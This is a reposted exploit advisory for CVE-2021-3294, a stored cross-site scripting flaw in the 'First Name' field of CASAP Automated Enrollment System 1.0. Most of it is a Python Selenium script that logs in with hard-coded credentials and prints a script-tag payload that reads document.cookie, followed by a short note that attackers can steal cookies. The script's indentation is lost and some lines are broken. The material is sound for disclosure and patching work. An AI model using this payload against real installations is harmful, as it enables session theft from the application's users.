Wednesday, February 17, 2021

CASAP Automated Enrollment System 1.0 Cross Site Scripting

# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
# Author: nu11secur1ty
# Date: 02.15.2021
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Athor: https://www.sourcecodester.com/users/yna-ecole
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# CVE: CVE-2021-3294


[+] Credits: (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294

[Exploit Program Code]
#!/usr/bin/python3
# author @nu11secur1ty
# For CVE-2021-3294

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
import os


#enter the link to the website you want to automate login.
website_link="http://localhost/Final/index.php"

#enter your login username
username="yna.ecole"

#enter your login password
password="12345"


#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="login"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

exploit="nu11<script>alert(document.cookie)</script>"
print("If everything is ok, please paste this in to the Users in section in
First Name\n")
print(exploit)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

[Vendor]
https://www.sourcecodester.com/users/yna-ecole


[Vulnerability Type]
XSS

[CVE Reference]
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294

[Security Issue]
CASAP Automated Enrollment System 1.0 is affected by cross-site scripting
(XSS) in users.php.
An attacker can steal a cookie to perform user redirection to a malicious
website.


[Video]
https://www.youtube.com/watch?v=_nhIZyJ8rxM


@nu11secur1ty
https://www.nu11secur1ty.com/
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated